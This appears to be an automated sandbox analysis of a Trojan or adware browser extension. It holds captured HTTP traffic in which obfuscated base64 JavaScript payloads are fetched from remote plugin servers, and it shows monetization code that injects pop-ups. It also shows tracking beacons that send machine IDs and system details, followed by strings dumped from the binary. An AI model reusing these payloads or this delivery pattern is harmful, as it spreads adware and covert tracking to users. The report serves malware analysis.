if (typeof setup2 === 'function') { setup2('MTY3MjRjNTQ0MjUxNTcxYjE2MTYxZDJkMWUxODQwNGI1NTUxMGExNjE5MDg1NjViNGQxODE2MWU0YzEwNDMwZjAzMDYwZTE1MDYwMDBlNGMwMzFkMTg1YjExMDE1YTEyNGMwODFlNDcwZjE1MGYwMTE0MWEwNTBjMjQxYzUxMmIzZDMyMjczYzMxMzEzZjMxMjgzMTMwMmUzNjMyMmYzMjMyMzEyODJiM2Q1NzE2MWMxNzBjMTkwYTE1MzcwZDE1MTA0ZTNkM2QyZTJhMjMyNzMxMjMzYzM3MjczMDMyM2IyMzIxMmMyNTI3MmEzZDIxMjIzYzI5MmIzZDU3MTQwMzEyMmMwYzE1MDk0OTNkMmUzNjIxMmQzMTNlMmEyNTMwMjcyMzJhMzIzMjMyMzIzNjJkMzkyNzJlMmE1MTRlNjg0ZDU4NGM1NDQwMTkwMTA3MTIxMTM4MGEwMDU2NTg1MTU3MWIxNjE2MWQwYjU2NWI0ZDE4MTYxZTRjMTA0MzBmMDMwNjBlMTUwNjAwMGU0YzAzMWQxODViMTEwMTVhMTI0YzA4MWU0NzBmMTUwZjAxMTQxYTA1MGMyNDFjNTEyYjNkMzIyNzNjMzEzMTNmMzEyODMxMzAyZTM2MzIyZjMyMzIzMTI4MmIzZDU3MTYxYzE3MGMxOTBhMTUzNzBkMTUxMDRlM2QzZDJlMmEyMzI3MzEyMzNjMzcyNzMwMzIzYjIzMjEyYzI1MjcyYTNkMjEyMjNjMjkyYjNkNTcxNDAzMTIyYzBjMTUwOTQ5M2QyZTM2MjEyZDMxM2UyYTI1MzAyNzIzMmEzMjMyMzIzMjM2MmQzOTI3MmUyYTUxNGU2ODRkNTg0YzU0NDAwMTE5MDYwNTBiMDMzMTA4NTY1ODUxNDc0YjU0NjgxMA==', 'mxltbqusbb'); }t>....
GET /plugins/mins/273.js?ver=4&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405263856"
Last-Modified: Sun, 13 Jul 2014 15:04:16 GMT
Cache-Control: max-age=900
Content-Length: 1047
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
if (typeof setup2 === 'function') { setup2('MTA2MTRmNDU1OTUwNDQwNjE1MDUxYjNlMWQwOTViNGE0NjRjMDkwNTFmMWI1NTRhNTYxNDU3MWYxMDE1MGYxZTA5MDQxNTQ0MDI1YjU5NWYwODA3MDAxMDFkMTYxNDAxMGYwNTQ1MDUwYTExNTYwMzA1MWMwODAxMWYxODQwMDYxNjFlMTIwYjE5MDUxZTBhMDMwZjBhNWYxMDVjNGUxMjFmMTMwNTE2NTcxYTE1NTEwMDE3MGQzNDA2MDE0NDQxNTc1YTU0NTcxODFlMGQwNDFmMTYzOTA3MDU0YzM0MzQyYzM3MzYyMzM1M2MyODM1MmUzOTMwMjAyMTI0MjMyMDI1MzQyZjM0M2MzMDNiMmYyZjJhM2UyZTRkMTgwZDE3MTgxZTAyNTMzZTJlMjgzOTIwMzYyYTIyMmYyYTI0MjMzNDJhM2YzNTI2M2UyNzIzMjQyZTM0NDk0MzZmNTk1MDQ2NGU0MzE5MWYxZjFmMTYyYzAyMGE0YzViNTE0OTAzMWIxMTA5MDM1YzQxNGUxNTVhMWExZTAxMWQwNTAwMGYwZDQ1MGY1ZTU3NGIxYTFjMDkxYjA1MTcxOTA0MDExMTU3MWUwMzFhNGUwMjA4MTkwNjE1MGQwMzQ5MGQwZTFmMWYwZTE3MTEwYzExMGEwNDEyNWUxZDU5NDAwNjBkMDgwYzFkNGYxYjE4NTQwZTAzMWYyZjBmMGE1YzQwNWE1ZjVhNDMwYTA1MDQwZjA3MTczNDAyMGI1ODI2MmYyNTNjMmUyMjM4MzkyNjIxM2MyMjM5MmIzOTI1MmUyNTJiMjAzZDJmMzUzYjIzMmUyMjJmMzAzYTVmMDMwNDFjMDAxZjBmNTYzMDNhM2EyMjI5M2QzMjIzMjIyZjJhMzcyNjMxMzYzZTNlM2YyYTI2MmEzYTI2NTI0YTY0NDE1MTRiNGI0ZDE1MTUwNTAxMDcwZjM4MGY0OTU1NDU0YjQ3NTU2NDFj', 'kkoeypfnaq'); }....
GET /plugins/mins/262.js?ver=2&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411293488"
Last-Modified: Sun, 21 Sep 2014 09:58:08 GMT
Cache-Control: max-age=117
Content-Length: 1075
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDIwZjA4M2QwMDQ5NDg0MTU1NDE1NzZjMWI=', 'dkragwefft'); }....
GET /plugins/mins/263.js?ver=2&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411293476"
Last-Modified: Sun, 21 Sep 2014 09:57:56 GMT
Cache-Control: max-age=381
Content-Length: 1075
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
if (typeof setup2 === 'function') { setup2('MTA3ODU2NTA0NjU0NTQwZDE4MWIxYjI3MDQxYzQ0NGU1NjQ3MDQxYjFmMDI0YzVmNDkxNzEyMGIwZjBlMDgxYTEzNDE0YjE1NTgwNDA3MGUwNjEzMWYxODAyNWExODAwMTg0MDE4MDcxNDVmMTA0NzQ0NTQ1NTBkMGY1ZDI5MmYyNTI2MzkzNjNmM2QyMjM2MzMyMjM5MzEyZTMxMjkyMTJmMzczMjJmMzUyMTM0M2EyNTJiMzQyZDU5MWM0ODFlMDU1YTFjMDYwZjRmNDc0MDVmNDA1MDAwMTQxYjU2MmQyOTMzMzQzYjI1MzYzZTI2MmYzNzI0MmYyNzI0MjYzYTIyMmUyNjM3MjkyZjQwMDcwZjE2MTgwYTA2MWIxMjRkMzkyYjM1MzcyMzNjMzgyMDNmMzQyMzI2MjkyYzIyM2MzZjMzM2EzYzIzMjYyOTMwM2YyYTM5MmQzZjM0MzkyYjU0NDk2NjRmNGI1MjU2NTIwZTAwMDIxNTFmM2ExOTFlNTQ0YTQ2NTYxZTExMTgxZjE4NDg1OTVmMDUxMDE4MDYwZDBjMDMxNzQ3NWQwNzVhMTcwZTBkMDIwYTFiMWUxNDQ4MWExMzExNDMxYzFlMTA1OTA2NTU0NjQ3NWMwZTBiNDQyZDI5MzMzNDNiMjUzNjNlMjYyZjM3MjQyZjIzMmMyMjIwMjIyYjJlMzYyOTIzMzMzNjI5MmMyODMwMzQ1ZDFhNWUwYzA3NDkxNTA1MGI1NjQzNDY0OTUyNTIxMzFkMTg1MjM0MmQzNTIyMjkyNzI1MzcyNTJiMmUyMDI5MzEzNjI0MjkyYjJkMjIyZTJkMjk1NjE1MGQwNTExMDkwMjAyMTY0YjJmMzkzNzI0MmEzZjNjMzkzYjMyMzUzNDJiM2YyYjNmM2IyYTNlM2EzNTM0MmIyMzM2MjkzZDM0M2IzMjJmMzk1NjVhNmY0YzRmNGI1MjU0MDAwYTAxMTEwYzAyMjYwZjUwNGM1MDU0NDI0NTZmMTE=', 'krvpftvelo'); }....
GET /plugins/mins/233.js?ver=7&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273128"
Last-Modified: Sun, 17 Aug 2014 10:58:48 GMT
Cache-Control: max-age=900
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds065.am4.c
if (typeof setup2 === 'function') { setup2('MDE2NzdiNGMxZDEwMTIxZTM2MDcxNjRmNDg0ZTU3MGMxMjFhMTM0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0ZjFhMWEwMTE0MTUzYjExMTk1ODU3NTI0YzFkMTAxMjFlMTA0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0ZjAyMDIwMDAzMGYwMDJhMTE1ODU3NTI1YzQ2NTc0YTY0NDM1NTVhNGQ1MDE4MTAxNjEyMDcwMDE0MTY0ZjQ4NGUyZTQ2MDcwYTEwNTcyNzQxNzg0ZTU1NDQ0NjRjMGExYjE2MDQxYzBiM2YzNzQ0NTQ0MzU3MGQwNDFjMGExYTEzNDgzMTExMDMwMDVjNDU1ZTQ1MWM1NzVlNTY0NTVhNTA1MjE1NTU0MzE2MWIwMTE5MTMxZTFhMGIwNzNiMTUxYjAxMWMxZTRhNDg0ZTUyM2IzOTJkMzEzYTI5M2UyMDI3MzEyMTM0MzEyNjJkMmUyODNjMmEzMDIwMzkzZDM2MzcyNTI0MzYzMTJhNDM0YTRlNDQxNDFlMDkxZDAwMWIwNTBiMGI0NDRmNWE0YTJkMzEzNjM2MjkzZDMwMjczMzI5MzczYzJhMjUzNjNlM2MzYjNiMjAzNzMxMmE0MzFiNTU0MTdmMDc=', 'zmrnudfncu'); }....
GET /plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405929866"
Last-Modified: Mon, 21 Jul 2014 08:04:26 GMT
Cache-Control: max-age=900
Content-Length: 508
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862437.cds065.am4.c
appAPI.internal.monetization = appAPI.internal.monetization || {};.if (typeof appAPI.internal.monetization.plugins === "undefined") { appAPI.internal.monetization.plugins = {}; }..appAPI.internal.monetization.plugins[226] = function() {..if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) {...if (appAPI.internal.monetization.getCampaignId() == 0) {....appAPI.internal.monetization.loader.setCampaignId(1026);...}..}.};....
GET /plugins/mins/221.js?ver=4&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1404650838"
Last-Modified: Sun, 06 Jul 2014 12:47:18 GMT
Cache-Control: max-age=900
Content-Length: 413
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862437.cds065.am4.c
appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,["pops"])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:"DOWNLOADS"}))();};....
GET /plugins/mins/195.js?ver=28&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1404650834"
Last-Modified: Sun, 06 Jul 2014 12:47:14 GMT
Cache-Control: max-age=900
Content-Length: 408
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds037.am4.c
appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,["pops"])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:"LITE"}))();};....
GET /plugins/mins/192.js?ver=9&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273151"
Last-Modified: Sun, 17 Aug 2014 10:59:11 GMT
Cache-Control: max-age=900
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds037.am4.c
if (typeof setup2 === 'function') { setup2('MTE3YTYzNGMxYzA2MTkwNTNlMTQwNjUyNTA0ZTU2MWExOTAxMWI1YzQ1NWYwYjFkMDYwNDQwMTQ0NTA3MDExMTA3MGYxZDFhMDk1YjA1MDMxZTVmMTkwYTViNDM1YTQ1NWI0OTViNDA1YTU2NWExODFlNTc0NzZjNjM1MjAyMWEwMDAyMWUyMDE5MGE0ODRhNGE0YzFjMDYxOTA1MTg1YzQ1NWYwYjFkMDYwNDQwMTQ0NTA3MDExMTA3MGYxZDFhMDk1YjA1MDMxZTVmMTkwYTViNDM1YTQ1NWI0OTViNDA1YTU2NWExODFlNTc0NzZjNjM1MjFhMDIwMTE1MDQxYjIyMDI0ODRhNGE1ZjRkNDA0MTdmNGI0NjRhNTA0ODE4MTEwMDE5MWMwODA3MDY1MjUwNGUyZjUwMGMxMTE4NDQzNzVjNjA0ZTU0NTI0ZDU3MDIwODA2MTkwNDBiM2UyMTRmNGY0YjQ0MWQxOTA0MGExYjA1NDMyYTE5MTAxMDQxNWQ1ZTQ0MGE1YzQ1NWI1ZTRhNGQ0YTE1NTQ1NTFkMDAwOTBhMDMwMzAyMGIwNjJkMWUwMDA5MGYwZTU3NTA0ZTUzMmQzMjM2MzkyOTM5MjMzODI3MzAzNzNmMmEyZTNlM2UzNTI0MmEzMTM2MzIyNjNlMjQzNTM5MmUzMTJiNTU0MTU1NGMwNzBlMTQwNTAwMWExMzAwMTA0YzVjNGE1NzM1MzEzNzIwMjIyNjM4MzQyMzM0MmYzYzJiMzMzZDI1MzQyODJiM2QyZjMxMmI1NTEwNGU0OTZjMTc=', 'jpjntrmukf'); }....
GET /plugins/mins/180.js?ver=12&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405846499"
Last-Modified: Sun, 20 Jul 2014 08:54:59 GMT
Cache-Control: max-age=630
Content-Length: 1383
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QzYjM5MjkzNTJkMjQyYjMxMzg0NDU4NTg1YTE1MTcwYjVlNTM1MTUxNTk1ODVhMDE0NTVlNTg1ZDUwNTA1ODUzNWE1MzQ0NTg1ODVjNDExNjBiMDMwODVhMmQzMjJjM2MyODMxM2QzODI1MjMzNzNmMzAyZjM3MzIzMTIzMjgzODJkNGIxYjFiMGUwNjUzMzUzMzI0MjAyMjNjM2QzNTJiMmEyZjNlMzgzYjIzM2MzYTI2MmUyMjJmM2UzODI3M2UyYTNjMzgyYjJhMzUzMzQ1NWU2NzY2NGMxNzBlMWIwZDA1MDkzYjA5NGQ1NDQ3NTM1NjVhNjYxYQ==', 'njlgrmongb'); }....
<<< skipped >>>
GET /plugins/mins/102.js?ver=10&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405241400"
Last-Modified: Sun, 13 Jul 2014 08:50:00 GMT
Cache-Control: max-age=900
Content-Length: 1047
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
if (typeof setup2 === 'function') { setup2('MGU3OTQzNDk1MTVhNDExODAyMTkwNTI2MTEwNTUzNDA0MzUyMWUxOTAxMDM1OTQ2NWUxMzRkMTMwNDA5MDcxNzEzMDMwMjU0MGExZTEwMDI1YTEwMTEwZDAzNTUwOTExMDAwYzA2MTAxMTAwMDEwZTRkMWEwNTUyMTYxYjAyMDcxZjFmMGY0ZDE1MWYxMTAxM2MzNjJlMzkzMTNmMjUzZTI3M2EyNzJjMjMyNTI2MjgyMjI4M2IzNzI2MmQyZTI5MzYzMjI5MjQzMTJjM2M0ZjEwMGExMzI0MWYxOTE5MTY1ZTM2MmUzOTMxM2YyNTNlMjczYTI3MmMyMzI1MjIyMDI2MzIzYjMyMmUyYzJlMjU0NTE4MWYwOTQ4MmMzYzJhMjMzNTMwMjMyNDI0MzEzNjMxMzYyNDI5MjYyMjI5MjQzMTJjM2M0YjVkNzA0MzUwNTY0ZDU3MWIxNzFkMDEwOTM2MDIxYTRmNGY1MzQxMDEwNTBlMTMwMzRjNDI1YTFhM2MwYTAzMWUxMTE0MDYwNzA2MmMwYTA3MTcxNTRkMDQxYTFlMTYxNzBkNDcxMjE1MGU1ZjE1MWYxMTAxNGMwMzEwMGMwMjAzMTUxZjFjMDMxNzQ3MWIwOTVjMTMxZTBjMWIxZDA2MDU0YzE5MTExNDA0MzIyYTJjMjAzYjNlMjkzMDIyM2YyOTMwMjEzYzJjMjkyZTI2M2UzMjI4MzEyYzMwM2MzMzI1MmEzNDI5MzI1MzEyMTMxOTI1MTMxNzFjMTM1MDJhMmMyMDNiM2UyOTMwMjIzZjI5MzAyMTNjMjgyMTJhM2MzZTM3MjAzMDJjM2M0ZjE5MTMwNzRkMjkzMjM2MjEyYzNhMjIyODJhMzQzMzNmMmEyNjMwMmMyMzI1MmEzNDI5MzI1NzVmNDM0OTUxNWE2OTUwNTY0ZDU1NTExMzA1MDQxZDBhMWUzZjA5NTc0OTQzNTg0MTQ4NjkwZA==', 'usciqzcpvm'); }....
GET /plugins/mins/91.js?ver=85&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1413792022"
Last-Modified: Mon, 20 Oct 2014 08:00:22 GMT
Cache-Control: max-age=586
Content-Length: 182280
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds040.am4.c
(function(K){var y=[].slice;var x={};var a=function(ap){if(typeof ap=="string"&&typeof ap.trim=="function"){return ap.trim();}return ap==null?"":ap.toString().replace(/^\s /,"").replace(/\s $/,"");};function f(ap){var aq=x[ap]={},ar,at;ap=ap.split(/\s /);for(ar=0,at=ap.length;ar<at;ar ){aq[ap[ar]]=true;}return aq;}var F=function(ap,aq){var at=[];for(var ar=0;ar<ap.length;ar ){if(ar in ap){var au=aq(ap[ar],ar,ap);if(au!=null){at.push(au);}}}return at;};var ab=function(at,aw,ar){var aq,au=0,av=at.length,ap=av===undefined||appAPI.utils.isFunction(at);if(ar){if(ap){for(aq in at){if(aw.apply(at[aq],ar)===false){break;}}}else{for(;au<av;){if(aw.apply(at[au ],ar)===false){break;}}}}else{if(ap){for(aq in at){if(aw.call(at[aq],aq,at[aq])===false){break;}}}else{for(;au<av;){if(aw.call(at[au],au,at[au ])===false){break;}}}}return at;};var H=function(ar){ar=ar?(x[ar]||f(ar)):{};var ax=[],ay=[],at,au,aq,av,aw,aA=function(aB){var aC,aF,aE,aD,aG;for(aC=0,aF=aB.length;aC<aF;aC ){aE=aB[aC];aD=appAPI.utils.isArray(aE)?"array":(appAPI.utils.isFunction(aE)?"function":"");if(aD==="array"){aA(aE);}else{if(aD==="function"){if(!ar.unique||!az.has(aE)){ax.push(aE);}}}}},ap=function(aC,aB){aB=aB||[];at=!ar.memory||[aC,aB];au=true;aw=aq||0;aq=0;av=ax.length;for(;ax&&aw<av;aw ){if(ax[aw].apply(aC,aB)===false&&ar.stopOnFalse){at=true;break;}}au=false;if(ax){if(!ar.once){if(ay&&ay.length){at=ay.shift();az.fireWith(at[0],at[1]);}}else{if(at===true){az.disable();}else{ax=[];}}}},az={add:function(){if(ax){var aB=ax.leng
<<< skipped >>>
GET /stats.gif?action=daily&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&campaign=001359&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=33&bgver=1&pluginsver=27&curtime=1413862412&lifetime=0&rnd=2940 HTTP/1.1
Accept: */*
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: zLFW5JNHHsEzn3gsP6/gWOmvbfdsRf6fkxH80jtB0EM9V3Bc5dmd00PwXCXPANXu
x-amz-request-id: C4261FADE2887ED2
Date: Tue, 21 Oct 2014 03:33:55 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Feb 2014 23:56:43 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /apps.gif?action=update&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&subid=0&zdata=0&appver=102&bgver=2&pluginsver=93&curtime=1413862438&lifetime=26&oldappver=33&oldbgver=1&oldpluginsver=27&rnd=793 HTTP/1.1
Accept: */*
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 41WsFdMcUxxYd8P8u1KxQOL8X SkUplRhAHoeylsnadbFr6Bv/KrZSxPD6ObRUqE
x-amz-request-id: 1369AB04FE01EB82
Date: Tue, 21 Oct 2014 03:33:59 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Feb 2014 23:56:30 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe_852:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
operator
operator
GetProcessWindowStation
GetProcessWindowStation
InternetCrackUrlW
InternetCrackUrlW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
KERNEL32.dll
KERNEL32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
0)0>1\1~1
0)0>1\1~1
Amscoree.dll
Amscoree.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
kernel32.dll
kernel32.dll
USER32.DLL
USER32.DLL
AF2.exe
AF2.exe
AF1.exe
AF1.exe
AF1.exe -d
AF1.exe -d
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe
